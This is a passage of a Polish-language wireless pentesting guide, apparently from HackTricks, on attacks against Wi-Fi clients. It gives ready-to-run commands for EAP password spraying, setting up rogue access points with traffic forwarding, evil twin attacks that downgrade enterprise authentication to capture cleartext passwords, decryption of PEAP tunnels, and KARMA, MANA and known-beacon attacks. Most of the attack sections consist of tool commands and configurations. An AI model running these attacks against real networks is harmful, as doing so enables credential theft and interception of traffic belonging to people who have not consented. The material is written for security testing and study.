ładunku TLS są zastępowane wychodzącą wiadomością RADIUS, zastępując anonimowy atrybut User-Name i atrybuty TTLS EAP-Message znajdujące się w przychodzącym żądaniu RADIUS.
Więcej informacji można znaleźć pod adresem https://www.interlinknetworks.com/app_notes/eap-peap.htm
EAP-Bruteforce (password spray)
Jeśli oczekuje się, że klient będzie używał nazwy użytkownika i hasła (zauważ, że EAP-TLS nie będzie w tym przypadku ważne), można spróbować uzyskać listę nazw użytkowników (patrz następna część) i hasła i spróbować przełamać dostęp za pomocą air-hammer.
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
Możesz również przeprowadzić ten atak za pomocą eaphammer
:
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
Teoria ataków na klienta
Wybór sieci i roaming
- Protokół 802.11 definiuje, jak stacja dołącza do rozszerzonego zestawu usług (ESS), ale nie określa kryteriów wyboru ESS ani punktu dostępu (AP) w nim.
- Stacje mogą przechodzić między AP o tej samej ESSID, utrzymując łączność w budynku lub obszarze.
- Protokół wymaga uwierzytelnienia stacji do ESS, ale nie nakłada obowiązku uwierzytelnienia AP do stacji.
Listy preferowanych sieci (PNL)
- Stacje przechowują ESSID każdej sieci bezprzewodowej, do której się podłączają, w swojej liście preferowanych sieci (PNL), wraz z konfiguracją specyficzną dla sieci.
- PNL jest używana do automatycznego łączenia się z znanymi sieciami, poprawiając doświadczenie użytkownika poprzez usprawnienie procesu łączenia.
Pasywne skanowanie
- AP okresowo wysyła ramki beacon, ogłaszając swoją obecność i funkcje, w tym ESSID AP, chyba że nadawanie jest wyłączone.
- Podczas pasywnego skanowania stacje nasłuchują ramek beacon. Jeśli ESSID beakonu pasuje do wpisu w PNL stacji, stacja może automatycznie połączyć się z tym AP.
- Wiedza na temat PNL urządzenia umożliwia potencjalne wykorzystanie poprzez naśladowanie ESSID znanej sieci, wprowadzając urządzenie w błąd i zmuszając je do połączenia z fałszywym AP.
Aktywne sondowanie
- Aktywne sondowanie polega na wysyłaniu przez stacje żądań sondy w celu odkrycia pobliskich AP i ich charakterystyk.
- Skierowane żądania sondy są kierowane do określonego ESSID, co pomaga wykryć, czy określona sieć jest w zasięgu, nawet jeśli jest ukryta.
- Szeroko rozsyłane żądania sondy mają pole SSID o wartości null i są wysyłane do wszystkich pobliskich AP, pozwalając stacji sprawdzić, czy istnieje preferowana sieć, nie ujawniając zawartości PNL.
Prosty AP z przekierowaniem do Internetu
Przed wyjaśnieniem, jak przeprowadzać bardziej złożone ataki, zostanie wyjaśnione, jak po prostu utworzyć AP i przekierować jego ruch do interfejsu podłączonego do Internetu.
Za pomocą polecenia ifconfig -a
sprawdź, czy interfejs wlan do utworzenia AP i interfejs podłączony do Internetu są obecne.
DHCP i DNS
apt-get install dnsmasq #Manages DHCP and DNS
Utwórz plik konfiguracyjny /etc/dnsmasq.conf
:
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Następnie ustaw adresy IP i trasy:
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
A następnie uruchom dnsmasq:
dnsmasq -C dnsmasq.conf -d
hostapd
hostapd jest programem, który umożliwia uruchomienie punktu dostępowego Wi-Fi na karcie sieciowej. Może być używany do przeprowadzania testów penetracyjnych na sieciach Wi-Fi. hostapd obsługuje różne tryby działania, takie jak tryb AP (Access Point), tryb WDS (Wireless Distribution System) i tryb mesh (sieć siatkowa). Może być również skonfigurowany do obsługi różnych zabezpieczeń, takich jak WPA (Wi-Fi Protected Access) i WPA2 (Wi-Fi Protected Access 2). hostapd jest narzędziem przydatnym podczas testowania bezpieczeństwa sieci Wi-Fi i identyfikowania potencjalnych luk w zabezpieczeniach.
apt-get install hostapd
Utwórz plik konfiguracyjny hostapd.conf
:
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Zatrzymaj uciążliwe procesy, ustaw tryb monitorowania i uruchom hostapd:
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf
Przekierowywanie i przekierowanie
Forwarding and redirection are techniques used in networking to redirect traffic from one location to another. These techniques are commonly used in the context of pentesting WiFi networks to redirect traffic to an attacker-controlled device.
Forwarding
Forwarding involves redirecting network traffic from one interface to another. This can be useful in scenarios where you want to intercept and analyze network traffic flowing through a specific interface. By enabling forwarding, you can redirect traffic to your attacker machine and capture packets for further analysis.
To enable forwarding on a Linux machine, you can use the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirection
Redirection, on the other hand, involves redirecting traffic from one IP address to another. This technique is commonly used in phishing attacks, where an attacker redirects traffic from a legitimate website to a malicious one.
To perform IP redirection, you can use tools like iptables
on Linux. Here's an example command to redirect traffic from one IP address to another:
iptables -t nat -A PREROUTING -d <original_ip> -j DNAT --to-destination <new_ip>
Remember to replace <original_ip>
with the original IP address and <new_ip>
with the IP address you want to redirect the traffic to.
By understanding and utilizing forwarding and redirection techniques, you can gain more control over network traffic and redirect it to your advantage during a pentesting engagement.
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Evil Twin
Atak evil twin wykorzystuje sposób, w jaki klienci WiFi rozpoznają sieci, opierając się głównie na nazwie sieci (ESSID), bez konieczności uwierzytelniania punktu dostępu (access point) przez klienta. Kluczowe punkty to:
-
Trudności w rozróżnieniu: Urządzenia mają trudności w rozróżnieniu między prawdziwymi a fałszywymi punktami dostępu, gdy mają taką samą nazwę ESSID i ten sam rodzaj szyfrowania. W rzeczywistych sieciach często używa się wielu punktów dostępu o tej samej nazwie ESSID, aby bezproblemowo rozszerzyć zasięg.
-
Roaming klienta i manipulacja połączeniem: Protokół 802.11 umożliwia urządzeniom przechodzenie między punktami dostępu w tej samej ESSID. Atakujący mogą wykorzystać to, przyciągając urządzenie do rozłączenia się z obecnym punktem dostępu i połączenia się z fałszywym. Można to osiągnąć, oferując silniejszy sygnał lub zakłócając połączenie z prawdziwym punktem dostępu za pomocą pakietów deautentykacyjnych lub zakłóceń.
-
Wyzwania w wykonaniu: Skuteczne przeprowadzenie ataku evil twin w środowiskach z wieloma dobrze rozmieszczonymi punktami dostępu może być trudne. Wyłączenie jednego prawdziwego punktu dostępu często skutkuje połączeniem urządzenia z innym prawdziwym punktem dostępu, chyba że atakujący może wyłączyć wszystkie pobliskie punkty dostępu lub strategicznie umieścić fałszywy punkt dostępu.
Możesz stworzyć bardzo podstawowy Open Evil Twin (bez możliwości przekierowania ruchu do Internetu), wykonując:
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Możesz również utworzyć Zły Bliźniak używając eaphammer (zauważ, że aby utworzyć złe bliźniaki za pomocą eaphammer, interfejs NIE POWINIEN być w trybie monitorowania):
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
Lub używając Airgeddon: Opcje: 5,6,7,8,9 (w menu ataku Evil Twin).
Należy zauważyć, że domyślnie, jeśli ESSID w PNL jest zapisany jako chroniony przez WPA, urządzenie nie będzie automatycznie łączyć się z otwartym Evil Twinem. Możesz spróbować przeprowadzić atak DoS na prawdziwy AP i mieć nadzieję, że użytkownik połączy się ręcznie z twoim otwartym Evil Twinem, lub możesz przeprowadzić atak DoS na prawdziwy AP i użyć WPA Evil Twin, aby przechwycić handshake (korzystając z tej metody nie będziesz w stanie połączyć się z ofiarą, ponieważ nie znasz PSK, ale możesz przechwycić handshake i spróbować go złamać).
Niektóre systemy operacyjne i programy antywirusowe ostrzegają użytkownika, że połączenie z otwartą siecią jest niebezpieczne...
WPA/WPA2 Evil Twin
Możesz stworzyć Evil Twin używając WPA/2, a jeśli urządzenia są skonfigurowane do łączenia się z tym SSID za pomocą WPA/2, będą próbować się połączyć. W każdym razie, aby ukończyć 4-etapowy handshake, musisz również znać hasło, które klient zamierza użyć. Jeśli go nie znasz, połączenie nie zostanie ukończone.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
Enterprise Evil Twin
Aby zrozumieć te ataki, zalecam przeczytanie krótkiego wyjaśnienia WPA Enterprise.
Używanie hostapd-wpe
hostapd-wpe
wymaga pliku konfiguracyjnego, aby działać. Aby zautomatyzować generowanie tych konfiguracji, można użyć https://github.com/WJDigby/apd_launchpad (pobierz plik pythonowy do folderu /etc/hostapd-wpe/).
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
W pliku konfiguracyjnym można wybrać wiele różnych rzeczy, takich jak ssid, kanał, pliki użytkownika, certyfikat/klucz, parametry dh, wersja wpa i autoryzacja...
Używanie hostapd-wpe z EAP-TLS, aby umożliwić logowanie dowolnym certyfikatem.
Używanie EAPHammer
# Generate Certificates
./eaphammer --cert-wizard
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
Domyślnie EAPHammer oferuje następujące metody uwierzytelniania (zauważ, że GTC jest pierwszą metodą, która próbuje uzyskać hasła w postaci zwykłego tekstu, a następnie używane są bardziej niezawodne metody uwierzytelniania):
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
To jest domyślna metodyka, aby uniknąć długiego czasu połączenia. Jednak można również określić serwerowi metody uwierzytelniania od najmniej do najbardziej bezpiecznych:
--negotiate weakest
Możesz również użyć:
--negotiate gtc-downgrade
do użycia bardzo wydajnej implementacji GTC downgrade (hasła w postaci tekstu)--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP
do ręcznego określenia oferowanych metod (oferowanie tych samych metod uwierzytelniania w tej samej kolejności co organizacja utrudni wykrycie ataku).- Znajdź więcej informacji w wiki
Używanie Airgeddon
Airgeddon
może używać wcześniej wygenerowanych certyfikatów do oferowania uwierzytelniania EAP w sieciach WPA/WPA2-Enterprise. Fałszywa sieć zdegradować będzie protokół połączenia do EAP-MD5, dzięki czemu będzie w stanie przechwycić użytkownika i MD5 hasła. Później atakujący może spróbować złamać hasło.
Airggedon
daje możliwość ciągłego ataku Evil Twin (głośny) lub tylko tworzenia ataku Evil Twin do momentu połączenia się kogoś (gładki).
Debugowanie tuneli TLS PEAP i EAP-TTLS w atakach Evil Twin
Metoda ta została przetestowana w połączeniu PEAP, ale ponieważ deszyfrowuję dowolny tunel TLS, powinna działać również z EAP-TTLS
W konfiguracji hostapd-wpe zakomentuj linię zawierającą dh_file (od dh_file=/etc/hostapd-wpe/certs/dh
do #dh_file=/etc/hostapd-wpe/certs/dh
)
Spowoduje to, że hostapd-wpe
będzie wymieniać klucze za pomocą RSA, a nie DH, dzięki czemu będziesz mógł odszyfrować ruch później, znając prywatny klucz serwera.
Teraz uruchom Evil Twin używając hostapd-wpe
z tą zmodyfikowaną konfiguracją jak zwykle. Uruchom również wireshark
na interfejsie, na którym przeprowadzany jest atak Evil Twin.
Teraz lub później (gdy już przechwycisz pewne próby uwierzytelnienia) możesz dodać prywatny klucz RSA do wiresharka w: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...
Dodaj nowy wpis i wypełnij formularz tymi wartościami: Adres IP = dowolny -- Port = 0 -- Protokół = dane -- Plik klucza (wybierz swój plik klucza, aby uniknąć problemów wybierz plik klucza bez hasła).
I spójrz na nową zakładkę "Decrypted TLS":
Atak KARMA, MANA, Loud MANA i znane beacons
Czarne/białe listy ESSID i MAC
Różne typy list filtrów dostępu do kontroli dostępu do sieci (MFACL) i odpowiadające im tryby i efekty zachowania rogue Access Point (AP):
- Biała lista oparta na MAC:
- Rogue AP będzie odpowiadał tylko na żądania sondy od urządzeń wymienionych na liście białej, pozostając niewidocznym dla wszystkich innych nieuwzględnionych.
- Czarna lista oparta na MAC:
- Rogue AP będzie ignorował żądania sondy od urządzeń na czarnej liście, co skutecznie sprawia, że rogue AP jest niewidoczny dla tych konkretnych urządzeń.
- Biała lista oparta na ESSID:
- Rogue AP będzie odpowiadał tylko na żądania sondy dla określonych ESSID, co sprawia, że jest niewidoczny dla urządzeń, których lista preferowanych sieci (PNL) nie zawiera tych ESSID.
- Czarna lista oparta na ESSID:
- Rogue AP nie będzie odpowiadał na żądania sondy dla określonych ESSID znajdujących się na czarnej liście, co sprawia, że jest niewidoczny dla urządzeń poszukujących tych konkretnych sieci.
# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
KARMA
Ta metoda umożliwia atakującemu stworzenie złośliwego punktu dostępu (AP), który odpowiada na wszystkie żądania sondy pochodzące od urządzeń poszukujących sieci do połączenia. Ta technika oszukuje urządzenia, aby połączyły się z AP atakującego, naśladując sieci, których urządzenia poszukują. Gdy urządzenie wysyła żądanie połączenia do tego fałszywego AP, połączenie zostaje ukończone, prowadząc do błędnego połączenia urządzenia z siecią atakującego.
MANA
Następnie urządzenia zaczęły ignorować niechciane odpowiedzi sieciowe, co zmniejszyło skuteczność pierwotnego ataku karma. Jednak wprowadzono nową metodę, znaną jako atak MANA, opracowaną przez Iana de Villiersa i Dominica White'a. Ta metoda polega na tym, że złośliwy AP przechwytuje listy preferowanych sieci (PNL) z urządzeń, odpowiadając na ich rozgłoszeniowe żądania sondy nazwami sieci (SSID), wcześniej wywołanymi przez urządzenia. Ten zaawansowany atak omija zabezpieczenia przed pierwotnym atakiem karma, wykorzystując sposób, w jaki urządzenia zapamiętują i priorytetyzują znane sieci.
Atak MANA działa poprzez monitorowanie zarówno skierowanych, jak i rozgłoszeniowych żądań sondy od urządzeń. Dla żądań skierowanych, rejestruje adres MAC urządzenia i żądaną nazwę sieci, dodając te informacje do listy. Gdy otrzymuje żądanie rozgłoszeniowe, AP odpowiada informacjami pasującymi do dowolnej sieci znajdującej się na liście urządzenia, zachęcając urządzenie do połączenia się z złośliwym AP.
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
Głośny atak MANA
Głośny atak MANA to zaawansowana strategia stosowana w przypadku, gdy urządzenia nie korzystają z kierowanego sondowania lub gdy nieznane są atakującemu listy preferowanych sieci (PNL). Działa na zasadzie, że urządzenia w tej samej okolicy prawdopodobnie będą miały pewne nazwy sieci wspólne w swoich listach PNL. Zamiast selektywnie odpowiadać, ten atak rozsyła odpowiedzi na sondowanie dla każdej nazwy sieci (ESSID) znalezionej w połączonych listach PNL wszystkich obserwowanych urządzeń. Taka szeroka metoda zwiększa szansę, że urządzenie rozpozna znajomą sieć i spróbuje połączyć się z fałszywym punktem dostępu (AP).
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
Znany atak Beacon
Kiedy atak Loud MANA może nie wystarczyć, znany atak Beacon prezentuje inną metodę. Ta metoda siłowo próbuje nawiązać połączenie, symulując punkt dostępowy (AP), który odpowiada na dowolną nazwę sieci, przechodząc przez listę potencjalnych ESSID pochodzących z listy słów. Symuluje to obecność licznych sieci, mając nadzieję na dopasowanie ESSID w PNL ofiary, co skłoni do próby połączenia z sfałszowanym AP. Atak można wzmocnić, łącząc go z opcją --loud
, aby bardziej agresywnie zwabić urządzenia.
Eaphammer zaimplementował ten atak jako atak MANA, w którym wszystkie ESSID z listy są ładowane (można to również połączyć z --loud
, aby stworzyć atak Loud MANA + Znane beacons):
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
Atak znanego wybuchu sygnałów Beacon
Atak znanego wybuchu sygnałów Beacon polega na szybkim nadawaniu ramek Beacon dla każdego ESSID wymienionego w pliku. Tworzy to gęste środowisko fałszywych sieci, znacznie zwiększając prawdopodobieństwo, że urządzenia połączą się z podstępnie działającym punktem dostępowym, zwłaszcza gdy jest to połączone z atakiem MANA. Ta technika wykorzystuje prędkość i ilość, aby przytłoczyć mechanizmy wyboru sieci urządzeń.
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
Wi-Fi Direct
Wi-Fi Direct to protokół umożliwiający urządzeniom bezpośrednie połączenie ze sobą za pomocą Wi-Fi, bez konieczności tradycyjnego punktu dostępowego. Ta funkcjonalność jest zintegrowana w różne urządzenia Internetu Rzeczy (IoT), takie jak drukarki i telewizory, ułatwiając bezpośrednią komunikację między urządzeniami. Istotną cechą Wi-Fi Direct jest to, że jedno urządzenie pełni rolę punktu dostępowego, znanego jako właściciel grupy, który zarządza połączeniem.
Bezpieczeństwo połączeń Wi-Fi Direct jest ustanawiane za pomocą Wi-Fi Protected Setup (WPS), który obsługuje kilka metod bezpiecznego parowania, w tym:
- Konfiguracja za pomocą przycisku (PBC)
- Wprowadzanie PIN-u
- Komunikacja w polu bliskiego zasięgu (NFC)
Te metody, zwłaszcza wprowadzanie PIN-u, są podatne na te same podatności co WPS w tradycyjnych sieciach Wi-Fi, co czyni je celem podobnych wektorów ataku.
EvilDirect Hijacking
EvilDirect Hijacking to atak specyficzny dla Wi-Fi Direct. Odzwierciedla on koncepcję ataku Evil Twin, ale skierowany jest na połączenia Wi-Fi Direct. W tej sytuacji atakujący podszywa się pod prawowitego właściciela grupy w celu wprowadzenia urządzeń w błąd i połączenia z złośliwym podmiotem. Ten sposób można wykonać za pomocą narzędzi takich jak airbase-ng
, podając kanał, ESSID i adres MAC podszywanego urządzenia:
Referencje
- https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
- https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
- https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
- http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
- https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
TODO: Sprawdź https://github.com/wifiphisher/wifiphisher (logowanie za pomocą Facebooka i imitacja WPA w portalach przechwytywania)
Dołącz do serwera HackenProof Discord, aby komunikować się z doświadczonymi hakerami i łowcami błędów!
Wnioski z Hackingu
Zajmuj się treściami, które zagłębiają się w emocje i wyzwania związane z hakerstwem
Aktualne wiadomości o hakerstwie na żywo
Bądź na bieżąco z szybkim tempem świata hakerstwa dzięki aktualnym wiadomościom i wnioskom
Najnowsze ogłoszenia
Bądź na bieżąco z najnowszymi programami bug bounty i ważnymi aktualizacjami platformy
Dołącz do nas na Discordzie i zacznij współpracować z najlepszymi hakerami już dziś!
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.